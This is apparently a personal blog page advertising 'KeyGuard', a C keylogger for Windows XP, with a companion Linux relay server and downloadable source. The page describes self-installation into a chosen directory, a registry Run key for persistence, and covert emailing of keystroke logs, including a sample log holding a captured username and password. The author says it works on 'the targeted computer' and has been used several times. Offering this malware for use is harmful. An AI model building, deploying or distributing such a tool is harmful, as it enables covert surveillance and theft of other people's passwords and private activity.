Personal Computing and Development by Dag J. Nedrelid

KeyGuard – A keylogger in C

Main KeyGuard features:

• A background program that logs PC keyboard activity.
• Automatic system injection by copying itself into a specified directory and adding a run value in the registry for automatic execution on startup/reboot.
• Sends the log on e-mail when it has reached a specified amount of bytes, resets the log file for new use at every send. (Relay Server backlog will log until manual reset).
• Consists of just 1 standalone executable with file size of 167kb (68,5kb without the icon), injects itself into the system when executed, system will remain injected with it until uninstalled as specified in source file.
• Logs the most common keys of interest and formatting.
  Easy to extend its logging features.
• Does not depend on SMTP for sending logs. Can connect to a listening KeyGuard bouncer/relay server on the Internet somewhere that will receive data and forward it and/or just save it.

Info from KeyGuard.c

/*
    --
    KeyGuard

    An attempt at user activity logging by Dag J Nedrelid.
    This code is written and compiled in C.

    Designed for Windows XP clients.
    --

    A keylogger that logs the most important characters
    such as letters, numbers and common formatting. It
    can easily be extended by modifying the formatKeys[]
    array and its usage. Log is stored in a text file
    which is sent on e-mail.

    * It attempts to log in a reader-friendly way by
      logging activity under the active window titles.

    * It should be performance friendly without keeping the
      CPU towards 100% by sleeping 10 milliseconds each cycle.
      This is still fast enough to log a quick writer. 

    * It prevents logging the same key twice while same key
      is being held down in a proper way without missing the
      next key activity.

    * A mix of \r\n and HTML formatting, so it looks more
      readable on received mail and directly in text file.
      Of some reason \r\n won't trigger a newline effect in
      my text mails, and I refused to have it all on 1 line.

    * Sends you a log on e-mail and resets the log file for
      new usage. MAX_LOG_SIZE decides when to send the file.

    * The function InjectKeyGuard() is called by default:
      - It will attempt to put a copy of the file itself into
        the location defined by FILE_COPY_NAME.
      - It will attempt a windows registry modification so the
        copied file will start on every system boot/restart.

    * How to uninstall once injected:
      - Kill the process in task manager.
      - Delete the file specified in FILE_COPY_NAME
      - Delete the log file LOGFILE from same directory.
      - Delete the registry value named REGISTRY_RUN_NAME under:
        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    TIP: Compile with /MT and not /MD for standalone
         functionality and easy distribution.

    NOTE: Remember to link with WS2_32.lib, this code uses winsock
          to send the file through an SMTP server to an e-mail.

    The end product is a one-click keylogger that installs by itself.
    When compiled with /MT, executable file becomes ca 167KB in size.
*/

Log output example on e-mail:

[WINDOW: Google - Windows Internet Exp]
somesite.com

[WINDOW: Connect to somesite.com]
the username[Tab]thepassword

[WINDOW: Google - Windows Internet Exp]
I am searching stuff I should not search

Values such as the SMTP server to use, e-mail to receive logs – will differ in every case. It is designed for one-click execution injection, and as such it must be compiled individually with these values.

UPDATE 24th October 2008:
I have made a KeyGuard Relay Server (also programmed in C). This is a small linux multi-threaded server program that is able to relay connections from all KeyGuard2 versions.

The server is useful in cases where you are not sure about what SMTP the targeted computer is using, or where the SMTP security is too strict.
The KeyGuard project files
These files have been tested OK and been used several times with variations. I use the VC++ 2008 C compiler when making the binaries. Here are the source files – play with them, learn from them, use them wisely. Much can be improved and added, but I will not make any updates in near future as it covers what I have needed it for and I don’t have time for it.

KeyGuard
- Sends log through a local SMTP(mail) server where it’s installed.
Download the source

KeyGuard2
- Sends log through it’s own server, works everywhere.
Download the source

KeyGuard Relay Server
- Waits for authenticated calls from KeyGuard2 versions to forward the logs, and/or save them on the server itself. This is a very small multi-threaded server that can run on most linux servers as a normal user by just running the command “nohup ./KGServer &” to make it keep running after you log out. Binds to a port specified in advance.
Download the source